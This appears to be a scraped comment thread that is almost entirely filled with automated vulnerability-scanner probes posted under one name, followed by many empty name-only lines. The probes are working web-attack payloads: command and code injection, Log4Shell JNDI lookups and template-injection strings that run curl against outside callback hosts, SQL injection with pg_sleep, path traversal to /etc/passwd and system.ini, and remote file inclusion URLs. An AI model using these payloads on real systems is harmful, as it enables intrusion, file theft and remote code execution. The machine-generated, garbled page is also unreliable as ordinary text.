Esteban Gutiérrez
Is this for real?!
Yegor Krivenko
Troy Hunt
echo FgrYLwrLuw
Troy Hunt
sleep 10
Troy Hunt
ping -n 11 127.0.0.1
Troy Hunt
sleep(bindec(decbin(10)))
Troy Hunt
file_get_contents("http://bus3wz73w9gxpxpo8vijtm9"."uh6zbvqwqn.szp.prbly.win")
Troy Hunt
?>
Troy Hunt
?>
Troy Hunt
.sleep(bindec(decbin(10)))
Troy Hunt
.file_get_contents("http://bus3wz73w9gxpxpo8vijzwy"."mlgnwibgag.szp.prbly.win")
Troy Hunt
+sleep(bindec(decbin(10)))
Troy Hunt
+file_get_contents("http://bus3wz73w9gxpxpo8vijx1r"."6c6cqq1a4g.szp.prbly.win")
Troy Hunt
".sleep(bindec(decbin(10)))."
Troy Hunt
".file_get_contents("http://bus3wz73w9gxpxpo8vijgz3"."boe4win1hu.szp.prbly.win")."
Troy Hunt
(function(){var w=new Date().getTime()+10000;while(new Date().getTime()
Troy Hunt
"+(function(){var w=new Date().getTime()+10000;while(new Date().getTime()
Troy Hunt
(__import__("time").sleep(10))
Troy Hunt
(__import__("urllib").request.urlopen("http://bus3wz73w9gxpxpo8vijfhv"+"nvnv02fjzg.szp.prbly.win"))
Troy Hunt
"+(__import__("time").sleep(10))+"
Troy Hunt
"+(__import__("urllib").request.urlopen("http://bus3wz73w9gxpxpo8vijtvx"+"ajtduchmd6.szp.prbly.win"))+"
Troy Hunt
${jndi:ldap://127.0.0.1#${sys:java.version}.bus3wz73w9gxpxpo8vijhk6${lower:v}qqqrm0sb1.szp.prbly.win:1389/abc}
Troy Hunt
${jndi:ldap://127.0.0.1#${sys:java.version}.bus3wz73w9gxpxpo8vijmm3${lower:u}hnqtn6fai.szp.prbly.win/abc}
Troy Hunt
${jndi:dns://${sys:java.version}.bus3wz73w9gxpxpo8vij52x${lower:u}lii3dth86.szp.prbly.win/abc}
Troy Hunt
${jndi:ldap://${sys:java.version}.bus3wz73w9gxpxpo8vijxay${lower:i}ymqs28kve.szp.prbly.win/abc}
Troy Hunt
${j${lower:n}di:r${lower:m}i://${sys:java.version}.bus3wz73w9gxpxpo8vijpds${lower:x}4kaotiidz.szp.prbly.win/abc}
Troy Hunt
${${lower:j}ndi:${lower:l}dap://${sys:java.version}.bus3wz73w9gxpxpo8vijyuf${lower:d}nbloa6qti.szp.prbly.win/abc}
Troy Hunt
" / sleep(10) / "
Troy Hunt
case when cast(pg_sleep(10) as varchar) > ' then 0 else 1 end
Troy Hunt
case when cast(pg_sleep(10) as varchar) > ' then 0 else 1 end --
Troy Hunt
"case when cast(pg_sleep(10) as varchar) > ' then 0 else 1 end --
Troy Hunt
case (3+7)-3+(993963348) when not null then 1 else 1 end
Troy Hunt
case randomblob(990081584) when not null then 1 else 1 end
Troy Hunt
" | case (7+3)+5-(995744612) when not null then "" else "" end | "
Troy Hunt
" | case randomblob(991754204) when not null then "" else "" end | "
Troy Hunt
" | case (4+9)+3-(992841129) when not null then "" else "" end | "
Troy Hunt
" | case randomblob(996130346) when not null then "" else "" end | "
Troy Hunt
case (5+0)-2+(999441743) when not null then 1 else 1 end --
Troy Hunt
case randomblob(997680152) when not null then 1 else 1 end --
Troy Hunt
" | case (2-2)-7+(997260251) when not null then "" else "" end --
Troy Hunt
" | case randomblob(991032298) when not null then "" else "" end --
Troy Hunt
J0o5Tx5s
Troy Hunt
c:/Windows/system.ini
Troy Hunt
/../../../../../../../../../../../../../../../../Windows/system.ini
Troy Hunt
Windows/system.ini
Troy Hunt
file:///c:/Windows/system.ini
Troy Hunt
c:\Windows\system.ini
Troy Hunt
../../../../../../../../../../../../../../../../Windows/system.ini
Troy Hunt
/etc/passwd
Troy Hunt
/../../../../../../../../../../../../../../../../etc/passwd
Troy Hunt
/proc/meminfo
Troy Hunt
../../../../../../../../../../../../../../../../etc/passwd
Troy Hunt
etc/passwd
Troy Hunt
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Troy Hunt
.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/passwd
Troy Hunt
http://szp.prbly.win/s/rfi1
Troy Hunt
szp.prbly.win/s/rfi1
Troy Hunt
https://szp.prbly.win/s/rfi1
Troy Hunt
http://bus3wz73w9gxpxpo8vijno3zinjl2ighe.szp.prbly.win
Troy Hunt
bus3wz73w9gxpxpo8vij9qxnxtubwwf1n.szp.prbly.win
Troy Hunt
https://bus3wz73w9gxpxpo8vijgdlyy1jlsckev.szp.prbly.win
Troy Hunt
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("sleep 10") }
Troy Hunt
#set($engine="") #set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("sleep 10")) #set($null=$proc.waitFor()) ${null}
Troy Hunt
[[${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("sleep 10").waitFor()}]]
Troy Hunt
${script:javascript:java.lang.Runtime.getRuntime().exec("sleep 10").waitFor()}
Troy Hunt
{{"".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("sleep 10")}}
Troy Hunt
${__import__("subprocess").check_output("sleep 10", shell=True)}
Troy Hunt
{{__import__("subprocess").check_output("sleep 10", shell=True)}}
Troy Hunt
<%=system("sleep 10")%>
Troy Hunt
#{system("sleep 10")}
Troy Hunt
{system("sleep 10")}
Troy Hunt
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("curl http://bus3wz73w9gxpxpo8vijiet"+"pv9netud2z.szp.prbly.win") }
Troy Hunt
#set($engine="") #set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://bus3wz73w9gxpxpo8vijdsj"+"izqtclqu2x.szp.prbly.win")) #set($null=$proc.waitFor()) ${null}
Troy Hunt
[[${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("curl http://bus3wz73w9gxpxpo8vij0zp"+"4fsnzadfdp.szp.prbly.win").waitFor()}]]
Troy Hunt
${script:javascript:java.lang.Runtime.getRuntime().exec("curl http://bus3wz73w9gxpxpo8vijm27"+"xgnt0f1wp4.szp.prbly.win").waitFor()}
Troy Hunt
{{"".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("curl http://bus3wz73w9gxpxpo8vijtyy"+"y3rna3hwbr.szp.prbly.win")}}
Troy Hunt
${__import__("subprocess").check_output("curl http://bus3wz73w9gxpxpo8vijqkw"+"zdauia2kej.szp.prbly.win", shell=True)}
Troy Hunt
{{__import__("subprocess").check_output("curl http://bus3wz73w9gxpxpo8vij1lo"+"urd0du4hv2.szp.prbly.win", shell=True)}}
Troy Hunt
<%=system("curl http://bus3wz73w9gxpxpo8vij6uu"+"x5oq1lsiwv.szp.prbly.win")%>
Troy Hunt
#{system("curl http://bus3wz73w9gxpxpo8vijgwk"+"d068tmnakp.szp.prbly.win")}
Troy Hunt
{system("curl http://bus3wz73w9gxpxpo8vijjv3{""}7mgjcac5nj.szp.prbly.win")}
Troy Hunt
2709072599784770749.whatdoesascannersee.com
Troy Hunt
http://2709072599784770749.whatdoesascannersee.com
Troy Hunt
https://2709072599784770749.whatdoesascannersee.com
Troy Hunt
.2709072599784770749.whatdoesascannersee.com
Troy Hunt
//2709072599784770749.whatdoesascannersee.com
Troy Hunt
\\2709072599784770749.whatdoesascannersee.com
Troy Hunt
pRrLlY6LrJA5bgi1WAlpCsS
Troy Hunt
1dGvVWyU
Troy Hunt
J0o5Tx5s
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
stslcuua sadfi iefl
Troy Hunt
<%={{={@{#{${zj}}%>
Troy Hunt